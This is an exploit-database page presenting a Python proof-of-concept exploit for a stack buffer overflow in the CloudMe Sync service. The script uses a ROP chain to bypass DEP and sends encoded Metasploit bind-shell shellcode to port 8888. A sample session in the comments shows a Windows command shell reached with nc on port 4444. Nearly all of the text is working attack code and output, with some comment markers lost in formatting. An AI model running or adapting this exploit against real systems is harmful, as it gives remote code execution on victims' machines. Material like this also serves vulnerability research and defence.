CloudMe Sync 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) Exploit

2018-05-28
ID: 98088
CVE: None
Download vulnerable application: None
# Author: Juan Prescotto    
 # Tested Against: Win7 Pro SP1 64 bit    
 # Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe    
 # Tested Against Version: 1.10.9     
 # Special Thanks to my wife for allowing me spend countless hours on this passion of mine  
 # Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/)  
 # for his work on the original exploit  
                                               # Bad Characers: \x00     
 # SEH Offset: 2236    
 # Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll  
                                               # Victim Machine:    
 # C:\>netstat -nao | find "8888"   
 # TCP  0.0.0.0:8888  0.0.0.0:0 LISTENING 2640   
 # C:\>tasklist | find "2640"     
 # CloudMe.exe  2640 Console  1 36,632 K  
                                               # Attacking Machine:    
 # [email protected]:~/Desktop# python cloudme.py    
 # CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass   
 # [+] CloudMe Target IP> 192.168.12.4    
 # Sending buffer overflow to CloudMe Service    
 # Target Should be Running a Bind Shell on Port 4444!    
       # [email protected]:~/Desktop# nc -nv 192.168.12.4 4444   
 # (UNKNOWN) [192.168.12.4] 4444 (?) open    
 # Microsoft Windows [Version 6.1.7601]    
 # Copyright (c) 2009 Microsoft Corporation. All rights reserved.    
     # C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe>  
 # My register setup when VirtualProtect() is called (Defeat DEP) : 
              --
 # EAX = NOP (0x90909090) 
 # ECX = lpOldProtect (ptr to W address) 
 # EDX = NewProtect (0x40) 
 # EBX = dwSize 
 # ESP = lPAddress (automatic) 
 # EBP = ReturnTo (ptr to jmp esp) 
 # ESI = ptr to VirtualProtect() 
 # EDI = ROP NOP (RETN) 
    #!/usr/bin/python 
    import socket,struct 
     print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass'
    def create_rop_chain(): 
      rop chain generated with mona.py - www.corelan.be 
   rop_gadgets = [ 
   0x61d1e7fe,  POP ECX  RETN [Qt5Gui.dll]  
   0x690398a8,  ptr to &VirtualProtect() [IAT Qt5Core.dll] 
   0x6fe70610,  MOV EAX,DWORD PTR DS:[ECX]  RETN [libstdc++-6.dll]  
   0x61c40a6f,  XCHG EAX,ESI  RETN [Qt5Gui.dll]  
   0x68c8ea5a,  POP EBP  RETN [Qt5Core.dll]  
   0x68d652e1,  & call esp [Qt5Core.dll] 
   0x68fa7ca2,  POP EDX  RETN [Qt5Core.dll]  
   0xfffffdff,  Value to negate, will become 0x00000201
   0x6eb47092,  NEG EDX  RETN [libgcc_s_dw2-1.dll]  
   0x68d52747,  POP EBX  RETN [Qt5Core.dll]  
   0xffffffff,    
   0x68f948bc,  INC EBX  RETN [Qt5Core.dll]  
   0x68f8063c,  ADD EBX,EDX  ADD AL,0A  RETN [Qt5Core.dll]  
   0x68f9a472,  POP EDX  RETN [Qt5Core.dll]  
   0xffffffc0,  Value to negate, will become 0x00000040
   0x6eb47092,  NEG EDX  RETN [libgcc_s_dw2-1.dll]  
   0x61f057ab,  POP ECX  RETN [Qt5Gui.dll]  
   0x6eb5efa3,  &Writable location [libgcc_s_dw2-1.dll] 
   0x61dc14d1,  POP EDI  RETN [Qt5Gui.dll]  
   0x64b4ed0c,  RETN (ROP NOP) [libwinpthread-1.dll] 
   0x61ba6245,  POP EAX  RETN [Qt5Gui.dll]  
   0x90909090,  nop 
   0x61b45ea3,  PUSHAD  RETN [Qt5Gui.dll]  
   ] 
   return ''.join(struct.pack('<I', _) for _ in rop_gadgets) 
    rop_chain = create_rop_chain() 
                                     #msf payload(shell_bind_tcp) > show options 
 #Module options (payload/windows/shell_bind_tcp): 
 # Name  Current Setting  Required  Description 
 # EXITFUNC  thread  yes Exit technique (Accepted: '', seh, thread, process, none) 
 # LPORT 4444  yes The listen port 
 # RHOST  no The target address 
 #msf payload(shell_bind_tcp) > generate -b '\x00' -t py 
 # windows/shell_bind_tcp - 355 bytes 
 # http://www.metasploit.com 
 # Encoder: x86/shikata_ga_nai 
                               shellcode =  "" 
 shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33"
 shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99"
 shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94"
 shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb"
 shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18"
 shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c"
 shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2"
 shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed"
 shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a"
 shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a"
 shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27"
 shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d"
 shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac"
 shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34"
 shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8"
 shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d"
 shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38"
 shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f"
 shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b"
 shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69"
 shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9"
 shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2"
 shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26"
 shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf"
 shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed"
 shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4"
 shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7"
 shellcode += "\xb0\x5d\xf0\x2d"
     ip=raw_input('[+] CloudMe Target IP> ')  
    stack_pivot=struct.pack('<L',0x61d95f58) {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) :  SUB ESP,8  ADD ESP,0D8C  POP EBX  POP ESI  POP EDI  POP EBP  RETN 0x08  ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ} 
 rop_nop1=struct.pack('<L',0x68b1a714) * 300  RETN 0x10  ** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ} 
 rop_nop2=struct.pack('<L',0x61c6fc53) * 50  RETN  ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ} 
 nop = "\x90" * 20
    payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode)) 
       s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
 s.connect((ip,8888)) 
 s.send(payload) 
 print 'Sending buffer overflow to CloudMe Service'
 print 'Target Should be Running a Bind Shell on Port 4444!'
1-4-2 (www01)